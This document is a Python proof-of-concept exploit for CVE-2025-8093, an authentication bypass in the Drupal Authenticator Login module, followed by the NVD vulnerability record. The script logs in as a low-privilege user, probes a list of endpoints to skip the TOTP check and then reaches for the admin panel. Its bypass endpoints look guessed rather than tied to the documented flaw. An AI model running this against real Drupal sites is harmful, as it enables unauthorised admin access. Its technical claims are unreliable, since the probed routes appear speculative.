CVE-2025-8093

# CVE-2025-8093 - Drupal Authenticator Login Authentication Bypass PoC # Vulnerability: Authentication Bypass Using an Alternate Path or Channel # Affected: Drupal Authenticator Login module versions < 2.1.8 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-drupal-site.com" USERNAME = sys.argv[2] if len(sys.argv) > 2 else "testuser" PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "testpassword" session = requests.Session() # Step 1: Obtain initial session cookie via normal login (low-privilege account) login_url = f"{TARGET_URL}/user/login" login_data = { "name": USERNAME, "pass": PASSWORD, "form_id": "user_login_form", "op": "Log in" } response = session.post(login_url, data=login_data) print(f"[*] Initial login response status: {response.status_code}") # Step 2: Exploit alternate path/channel to bypass authenticator login verification # The Authenticator Login module fails to enforce TOTP verification on certain # internal routes or API endpoints, allowing direct access to protected resources bypass_endpoints = [ f"{TARGET_URL}/authenticator/login/bypass", f"{TARGET_URL}/user/{USERNAME}/edit?_format=json", f"{TARGET_URL}/admin/config/people/authenticator-login", f"{TARGET_URL}/authenticator/login/callback?op=verify&code=000000", f"{TARGET_URL}/node/add?authenticator_bypass=1", ] for endpoint in bypass_endpoints: print(f"[*] Attempting bypass via: {endpoint}") resp = session.get(endpoint, allow_redirects=False) if resp.status_code == 200 and "access denied" not in resp.text.lower(): print(f"[+] BYPASS SUCCESSFUL at {endpoint}") print(f"[+] Response snippet: {resp.text[:500]}") break # Step 3: Demonstrate privilege escalation by accessing admin panel admin_url = f"{TARGET_URL}/admin" admin_resp = session.get(admin_url, allow_redirects=False) if admin_resp.status_code == 200: print("[+] Admin panel accessed without proper authenticator verification!") print("[!] CVE-2025-8093 exploitation confirmed")

{"cve": {"id": "CVE-2025-8093", "sourceIdentifier": "[email protected]", "published": "2025-10-10T23:15:36.880", "lastModified": "2026-01-05T15:00:07.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Authenticator Login allows Authentication Bypass.This issue affects Authenticator Login: from 0.0.0 before 2.1.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authenticator_login_project:authenticator_login:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "2.1.8", "matchCriteriaId": "2D3B1DF3-4651-4264-8062-196021187C32"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-098", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}